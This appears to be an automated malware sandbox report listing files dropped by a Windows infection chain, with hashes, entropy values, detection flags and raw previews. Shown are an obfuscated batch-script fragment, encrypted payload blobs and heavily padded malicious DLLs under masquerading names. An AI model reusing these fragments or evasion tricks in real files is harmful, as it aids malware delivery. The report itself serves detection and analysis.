Preview:	Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize

C:\Users\user\AppData\Local\Temp\Fitting

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	64218
Entropy (8bit):	7.996758881771081
Encrypted:	true
SSDEEP:	1536:PKwBxCcWt2UqNKZSb5H/U36q/tUJKLT+aYkIR:jYt2/OV/w4RYDR
MD5:	46A51002CDBE912D860CE08C83C0376B
SHA1:	6D0AE63850BD8D5C86E45CBA938609A7F051F59B
SHA-256:	18070C4700DF6609E096F2E79F353844E3E98C9AACCA69919A8BAEB9F9890017
SHA-512:	ED7C8D09E305687DC687AB23F6A83692232677C120836C8F4B876C4DFA867B47E29684E7E1C7973F6C29EEED1B8530B96F609A6111DDE36D94F6657C9B5A4E44
Malicious:	false
Reputation:	unknown
Preview:	$S.v]U.H......;...g.-...4e.xC.W+<7.....FhK.CM..&qCp.....As.L.....>Q....Z..~>k.0..>.....Kh\KD.z%.J....H`S...]8=.CKN........Q..7..1..j...,.Wz.,.............j..<b..d..5a."`.$l......Y..C!>EM.&-.....\...,[$.......HMS..=.=0VBC.?.p......kWp;....-.Ye;...n.A$..2x.I.z....W.....9.Gg..}.....#.J.{.......~.H5.7-.m....p...<...{wJ[_.....W.....&....G....T.:..3q....A...E....e.....w.H..-...i.+..F....Y.FK\|A.9..\..........b....)..?e...6Z...J8.X.rU;..d...V0.v..\|].?[.K1`..{.}q...G..9.....M.........]...v.(.`>&?.l<........\|....V..b\&.s...?.$.a..H.g....v..5..../../J...Z>'J.X5A5.e........$..e.n.v.........#.0Om..r....E.'.zDw.@......,...-....P.....@wA&..5.5...@...d....j?.K..\[,..T.Y...x....7d.gc..^.....:..&r.....q&.x.dh7...d...`W.W.....#p4I.N..,.UK5..y4..k...hS.....gH...1..k....6..X.).#......IT.Y.aN...@...A.K.........H...A.....3^...e..Z.D.x...c..z\.u.8. /_.7?.........O...D.d./@-BEe..G.T......<.ld...CX..zC.ljM$..H.9...#_u..~Z...h.f?.J...-?.....v.0.5 ....l}..=c...*.

C:\Users\user\AppData\Local\Temp\Molecular

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997474648514076
Encrypted:	true
SSDEEP:	1536:OJpwtrTK0Sj35K4+x5Lclh8+c3CXpKUlNzHoaSJIRg77ah30fkD:6+JT7yiYX8z3CZXPHo9KVWkD
MD5:	8CA4BBB4E4DDF045FF547CB2D438615C
SHA1:	3E2FC0FDC0359A08C7782F44A5CCEBF3A52B5152
SHA-256:	4E4BB4AA1F996E96DB8E18E4F2A6576673C00B76126F846BA821B4CD3998AFED
SHA-512:	B45ED05FA6D846C0A38CEFCD5D256FDEE997B9010BC249A34D830953100CA779AB88547353CC8BADAF2908F59FF3A8C780F7CAC189C0F549246FEB504ECB5AF9
Malicious:	false
Reputation:	unknown
Preview:	.....%.i...9.M.a....C.Qv.=.bN.NK..I..Z.J.....mz..?QR."^...1.uO.x.z.=...vo....uE...2..j.K.W.....P..i...........H.^..U.....W.X$.S.6.;..V.1.....~{.....7.o?].....L..$..w.N\`%.D.G..Pp.....g....6.....sA.D.f..\.........F.........U.p...."..{."Ym..`.ne.o.....h9....s...~..pe[{..~.!.......A.#....YL........H...>......w_.5t6....\.bd..C..o<2.y.8-V.Dp..Jg...SH+.@.N0 q.n.M..(..X[...=k...6.._.]}.h..Q.G....l.M.@.JU.K.J....(...XXz......x...E.Gs<]....3.D.%O..)".,...K.Gtt...Y..b.<.S.v...R._......:i.;._.....c]/.N..T.`..+...h.)e............1..v S:..p.u.&.....5.k$...ZS.g....3Ze.....P.....p..H.v.{..q..A..k._.+.g..d.m...v..$....R'_.6r4.......j..XsCxF.....#.0........1.q...P....3C....3].8/(....@...[~.@9E.]..bN_k...."..hF4.T....A^.J.%...p..1{/].....0.3Yw.'.,......X..^1.Z...=&:. .......E....7o..hdz%\.c.qE....&.[F...._.g'.\|.I..;.[A..i.armG..+q......{q.+I&*.\|..A+.......jq.'.J...uR........n.v...;`..8<J.D...r;.... ..D.jE..&.#G.{s6.].-...v..{.....N.l....E..H.......C.Y1.d...

C:\Users\user\AppData\Local\Temp\Mtv

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	7557
Entropy (8bit):	6.206282583817788
Encrypted:	false
SSDEEP:	192:GHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3X:GHAHhww+/2nlP3r1WAL3X
MD5:	F3D7ABB7A7C91203886DD0F2DF4FC0D6
SHA1:	60FFBB095FCEEB2EA2B9E65355E9DBF1DE736D6C
SHA-256:	5867350B8AD8BB5D83111AED8B296B8C28328BA72B5BEDB0CBEB99B3DC600CB3
SHA-512:	9AF80787C63FA7DE9A22EEA3D1F13D25FF1558ED95321A8178DA734DCE5126F0B7322F13CDDD40C1BC67B65140F684A190DD117247F06600A07DB97B015AA367
Malicious:	false
Reputation:	unknown
Preview:	CRAWFORDFILLEDVERIFYSCALE..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2843136
Entropy (8bit):	6.4820389622529655
Encrypted:	false
SSDEEP:	49152:vbW49cvhcrpw9C1W42EGQy73KQngNgdKnkGMKyUTO17W5Vwgl+U5:vbW49Khcrpw9C1WBE+73KUZZKyUS17Wn
MD5:	97A370ACA7F83E19D8295AF2221BF211
SHA1:	AC373C0096B755214D7EDB2F6ABE4D0A615E10B2
SHA-256:	A2782238CFC4CE3E0D9602FD2AD6D96EC4B04AA0D8A56572518973239BF9911B
SHA-512:	578A425BFE51C7E855F9AA310AB36CF5C676BBC7D3BCD6E2F69CFC8CC79D96E8CB3E8F051C53DD2F6C4FEE6924614C2A1CBD09E0F8AB7904B623892A490B0ABB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ....................... ,.....B.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qpgdxncw. +.......+..:..............@...menimhwp. ....+......<+.............@....taggant.@....+.."...@+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\See

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997208571345154
Encrypted:	true
SSDEEP:	1536:WcKhUVngPRVt768UQOH96BBoYRoskvQIevMAVlXaR7ZQRu:EVt760O96BuYODQIev5XaR7ZAu
MD5:	84C831B7996DFC78C7E4902AD97E8179
SHA1:	739C580A19561B6CDE4432A002A502BEA9F32754
SHA-256:	1AC7DB51182A2FC38E7831A67D3FF4E08911E4FCA81A9F2AA0B7C7E393CC2575
SHA-512:	AE8E53499535938352660DB161C768482438F5F6F5AFB632CE7AE2E28D9C547FCF4ED939DD136E17C05ED14711368BDD6F3D4AE2E3F0D78A21790B0955745991
Malicious:	false
Reputation:	unknown
Preview:	...2.v..5.R.w&o(.9.A..B....g.b.'....3,m............Xo#.....}.".....{.......iT8d.g....W...q.?............[..........:r.k.....1....U.X.j(.c.....u..0....%2..[.<..`Bl.(.DW..@...7..P..m.E.......f.o.#c.Q.\|.G....ke[.D.....^!.k..!..i.......".'..g.n.1..{...J..>G..3.[........%....fT\...O.SS..<.I_PF..E..9..t./..."ae..%.Q.wBI..t3../].#.vCQ>U...lx....B74( ........1..g..2l.k.1.X.......fq.5......m.[..oZ.....?....I.UU0n...>..VZ....J..(...).h.9..s...h...M]..t8._.i....d.NQ...Hr..O.R..G.rl.:....h...'.S...U.7.......6.....>.r:..d>.-..........T+...OA; y.Ynj.13w..u.R......{....5.j[..\|.....t1.".)..L..l.=^.Z\.S6......sK.1.0>.....Q....X...O...^7'.....".Es.p.2...g.4....s..U..M'.3x.......jll.{E/...+B.5..=....PD....DH;A,h...7.._.....8....&.k.....>.?....z.g......\|...r..(....l...,...y...<....]....."+..@.s...:.......I]}+..XYm:.\|ns...3...(.gmt..5m.x.....i....<..oF[..1..<...Fv.6.c3.<.^........!WO`..o.....J~w...}....wt.ml....T1.....#".V.o..q...&...f......$.......d.u.9[..

C:\Users\user\AppData\Local\Temp\Spirit

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997700414089635
Encrypted:	true
SSDEEP:	1536:UbTfzEhiJxYN/aeuU5rg6QJ7mrO+NMwViBsSRgucsmgcqtEyKNcHDrlzLbQCu+Em:UbTwhqypFuUKByrO+JiFgOmgceEydHDb
MD5:	0814E2558C8E63169D393FAC20C668F9
SHA1:	52E8B77554CC098410408668E3D4F127FA02D8BD
SHA-256:	CFDC18B19FE2C0F099FD9F733FE4494AA25B2828D735C226D06C654694FCF96D
SHA-512:	80E70A6EB57DF698FE85D4599645C71678A76340380D880E108B391C922ADADF42721DF5AA994FCFB293AB90E7B04FF3D595736354B93FCB6B5111E90B475319
Malicious:	false
Reputation:	unknown
Preview:	,#.g.'....E.?9..>j.B1.xr...L].k5....<..n3.s1....[3.D...B.5u.1..9f...rS....H..x...[...j[....2...sGH..>q.X+.dT..y.k..K..x.ya..Ra.0.)0.......Q..E}.6Y.'.`.u_.../`l%..\;..=...I..U 7..M@\.v.J.....2...e.r.N..3.L..$.f.S.....OUp.>.%".l_?#.<T%..J...^2.H..=PY(...#MoK...+p...3{8.H...T.^.....i.}Yf..P....k7........QW.E&Vu]j.\.g]3d..U..`K>...u...F.E/S.Qw;..j.d.CWL..0....)?."...lJ.......>....U...8.....]V.......1...(.Y./..=..&7T4Sh.....6..@.....././..qg+./J...7..c.#...^....N./.....9..39.Pt...62.+.....A.y.n!U1...V..<.J.n.^.s..D...k.......4'7.K.T{b...2M.h2.y.2B.ZF.~...........e.lnP..6#..~.v....B.qrh.K.:V^.o...^..}......7..pJ3.s....A.g.T..(..)V..7.y..I.GiC..~......c+.~u..4V!5...1..........b.8....C.,...eV....l:..=k...%.-.....TI.\|.."...!...f)..EV*0.....W71........h.h..&...../.u..c.@.. ..-h...'..].otw_\P..b.Hz....8L8!=-...V.2T...6.T.F&..a\.....Qt......#...b..4.q.$]....F.!HE.....h..P.....:\.r...R...@cd......1.d..8.....H.`v.....=:^.#...p......h#m.g.

C:\Users\user\AppData\Local\Temp\Sponsorship

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.9974812887747095
Encrypted:	true
SSDEEP:	1536:uKBvAKYhV7WXUiDJs3tfBOn4EdtDKA5w1+naRsk:uUAKgbaJs9fBODj5Fny
MD5:	6785E2E985143A33C5C3557788F12A2B
SHA1:	7A86E94BC7BC10BD8DD54ADE696E10A0AE5B4BF0
SHA-256:	66BBE1741F98DBB750AA82A19BC7B5DC1CDBECF31F0D9DDB03FF7CF489F318C7
SHA-512:	3EDAD611D150C99DBB24A169967CC31E1D3942C3F77B3AF2DE621A6912356400C8003B1C99A7236B6BED65BD136D683414E96C698EABD33D66D7AB231CDFEE91
Malicious:	false
Reputation:	unknown
Preview:	v._.........6..O&.F...\^$..........-.%..xB.D.......".Y.i.O.e. Z..Z.U......,......~..Au..z.3.?..!...6.@.o..< ......D.9......E..Z7:!/.9}c.a.N1.[,8.g jO..[...w.^&A..u..aq..z-H....l..lIx .a...B....^...dP~3...S..V"...3.u..?....{...,o.EZ3..~B.j...."\9..7}l.G.............2....Fh....F\|.LDF+.7....2..."gK ..H.fO[..)......../...X..M...c..FV&S=..W]}..v.].b..P...?{.G.e.g.G..^;s0+.hB....U.LN-..l..G.zn.....t....Y.\.s....9.P..2Y...u{.bd.C..../t<t.."^..3[..........#B.w...5...rH..?.oo..\|.....T..u.\g.......G..%.v.E9c...5sZ;i)...y q_.Gp;...\|t. ........P...`..K.+....f....'..Jz./.....w....6l.c..R..A.N...oM..F.A....F....n.-9M...@:..C.......t..=w.Q....E..>.g{.....Z..dP;...1....rBts3@6.^..RM.Aq;8>.<..Qr.:.c..q.v.Z{...2..E.I.Jm .Q.vIci~kE.i4.......\...85m R...u...,.sE..k........O.0..$.b.5..."!}..,H}.A....{..#x.1>?.Y1..L8}n.p<.V5...]n...v....7.wZ.y.%]G8\|....UX...$.......A.'.T...jf..71..x......(.Y..1..P.h]m.lT..\.....PX.=y_DE7..........a.J.,J.._..d^!..!....O...SA9.W8^...)

C:\Users\user\AppData\Local\Temp\Sweet

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	886078
Entropy (8bit):	6.6221717879410384
Encrypted:	false
SSDEEP:	12288:2V0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:cxz1JMyyzlohMf1tN70aw8501
MD5:	6CEE6BD1B0B8230A1C792A0E8F72F7EB
SHA1:	66A7D26ED56924F31E681C1AF47D6978D1D6E4E8
SHA-256:	08AC328AD30DFC0715F8692B9290D7AC55CE93755C9ACA17F1B787B6E96667AB
SHA-512:	4D78417ACCF1378194E4F58D552A1EA324747BDEC41B3C59A6784EE767F863853EEBAFE2F2BC6315549BDDC4D7DC7CE42C42FF7F383B96AE400CAC8CF4C64193
Malicious:	false
Reputation:	unknown
Preview:	.j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.\|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j\|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...\|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......\|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I.

C:\Users\user\AppData\Local\Temp\Tmp5541.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp5552.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Twisted

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998072949966149
Encrypted:	true
SSDEEP:	1536:/vwNKjdasnic9ups6E94QDYcwUb/Dqm4ieDj1USYYZUJ+Wcl1DthXtM7aqib1Amp:nCKjdasit1EdWuWm4ieDjGSYYZUctPtt
MD5:	BA8C4239470D59C50A35A25B7950187F
SHA1:	855A8F85182DD03F79787147B73AE5ED61FB8D7B
SHA-256:	A6272116DC959A3197A969923F85C000A1388B0A02DF633DEC59B7273BDB421B
SHA-512:	1E6D42C249D206815000CC85D5216D13729246E114647D8CCF174B9BD679530B6B39DFAB2BFCC5D957CC0778A8CF029E544228978682FA285C5E3F9564C2EAF0
Malicious:	false
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Temp\Various

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.9982397133011816
Encrypted:	true
SSDEEP:	1536:+ym7ISM9/koP08TreJM3W/S8mc4NXffUk9IU6RV3EsSqDeKsij2J:+y0lQ/zP0GmbS8h4NPfz63EsSB0U
MD5:	2759C67BCCD900A1689D627F38F0A635
SHA1:	D71B170715ED2B304167545AF2BD42834CCF1881
SHA-256:	510CFD9523A0F8462E8CBDCBBF1AFCCF2AA69A9153472EE48FD28AD4FE06CA05
SHA-512:	AA9E26AD8824ED2CA8BF45C24939E305660CBC19F821A84A7407A16F91D71B2EB9DABA9059D379908F17C9E5A17C0C3E873E5CD7350EE8715E45B2B3EFF2531E
Malicious:	false
Reputation:	unknown
Preview:	5......Z..%D^..\|.....8.6[...8{......ZG.%.80.K[Xd...........56!.>...b9.T.m).mYm.cZ..cy..jC...65.....m+.~.......cl..Ot8..6.t..._=.Q.5..l\.r..>b#.........DU....1... 4.\|k.L.U\......;...D...M^.B...R)D.2...<.T....<GW+..I.....M[...z...k.s..[G].]..d?.o..t._.6h....R.....H..+.uK.i.A..%/..)u..o7%u!x..G.:...jA.F...q......[k....r...u.h.....5_..}Q.;...W.?...Q_......>..x\..dG..;...r......E...R.hq.......X..:..`.j]2s.L...i..)../..q..?..".......h;....')....;...J..l+...7...!.D...g.X.u.......uH..;gj..l.{.~7......\..k.S8...*...O..W.....v..A..C.Bo...z9.2B.."....`.%J Zv.../..I.....WW.l.O..,.@2].if.2....{m.{.i.Q.....j..y....td.}!....".........=.......5..T}0b.....HM.3.f.yA..........-cG..+...G.[`..........DN..".....\|..PU..DOr...lq/..#c....L.......4..6.X.}..KdI.o....;t...DL!.c... ...E..""..@m.m.(E..[]..x.z.......l..........'.......!....t....F......#./........\j...0.A...../a.o..%+..$..[4H.I..;.]:...o+a{Bi.'%C.~...J..^,X6...VNp........:m..e._.U.$.....As2C1<....@G..+.w

C:\Users\user\AppData\Local\Temp\WGTxLaJUJMXdPsRkrFVC.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054372428312684414
Encrypted:	false
SSDEEP:	24576:GeBZGBG/9ap+yhVQSn/Cq7yEepebjQWin/ZSfOuV3t/aelpVE:8LegYWinMf1VpaelpVE
MD5:	6D5490A1A8C459ADA896A9E798C6A29A
SHA1:	DB2FD20AF94C7F0845BB9BCF40E5DDA461ED69A2
SHA-256:	A8EDA848EF1C34C58A43A7978AEA77807293E7EC034209EF993CE00032F4BA09
SHA-512:	4DF21C0B6CFD9F2E4C884588DC3814B09DE004EA123087FB7AA6CB248B11C8B802390331D2F006FF024826037231FC408D4DED0C782E940A74D300F3CF780978
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g...........#...(..........................(j.........................@...........@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Witch

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996566915559803
Encrypted:	true
SSDEEP:
MD5:	79156AFDDD310BE36F037A8F0708A794
SHA1:	09EF36AE22B5EAB65D1F62166542601B8919399D
SHA-256:	7FAAF10D09A27842330725E6510D2754487C5B69BD40E11181DD75B03DF61503
SHA-512:	D1449126F2365F607A390E3B6FECB3BE100BFF9FAE1A773CF5815CAB29EEB72AB4E341022BDE9DE653FD62EDE0FB0C26D9010E524D87060AA364BF92A14E9D01
Malicious:	false
Reputation:	unknown
Preview:	...... WO.+\|`}....D.6.0.n..l&(....mz....3!.d...[..CmK...e.?....1x>I..:MNG).t.......g.4.5^..~....S.-p.b..g..@:.c.%GA}6K........9O.U.L(.\:..!.Y....8....p.se..g..\|.}.....2.W....s....?Qt.N.-O.d(.#..P....#Q.WQ..U............?3~7[........AI...h.\|.2"o..:...}.'T..1........(.8zU.1.m....tfxM..........Gk..1...i....f.eFe.W.+O...Q._ELT...R.h.4....c7.~.....d....V.(%O..b..r.@........m\|...:S. y{..[J..\!.`....%..W' .X.8..^..70.m.4.dy<....=.sG.@I....Y.Z'\.bz.jq..?z..3..6 -z..bha.V.(..^.....&...q{.GYU..#s..}...[.B.r.....[.oH...).48...+.....LB. .4...\..xM..........7.............(....r0J..t....8.P....28.r..=....'+..J n..d2k..Cl....&..J>...8..s...'.st..}..`.y.._.......L...\|p..D....r.i.x..+.Z....Y3?.......l.....r..6xbh..=..S........^.>2....d.=%.X..#....".9.S..tF.c.......Db.....c=he8U..3..1..z}..iD+.}!Q..hE..KiE..@.6...@.#kg3R....b..p.... .?..8..i+.........}.....wP....].og.-.20}N..j=..!.i._m......U.....Z...S6.;.....?,.y...8(.>...b.u........}....

C:\Users\user\AppData\Local\Temp\jwDqhXNxeUGDiYzIXhpX.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000802001\1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054344635209618186
Encrypted:	false
SSDEEP:
MD5:	18258F10EEB7B454AB7EA5D5B2859513
SHA1:	3A49C6D0B0F0EB2B49C7FD2976E44A051312E9DD
SHA-256:	7BEC4F6BD0587DD2AED913A399FBEB4490CC17885DC0254CA5A20DA63F150C0D
SHA-512:	7161AA80C6E0EC0F2A552E4ECFC4524613EB8382A5B39B5C5C6D7E65DA12B5942C8DEAB2BC72FFD31DC7E2E5251DD85C3122341EAEBE6FD2230022620837451C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........#...(...........................o.........................@......T.....@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.002340488769148356
Encrypted:	false
SSDEEP:
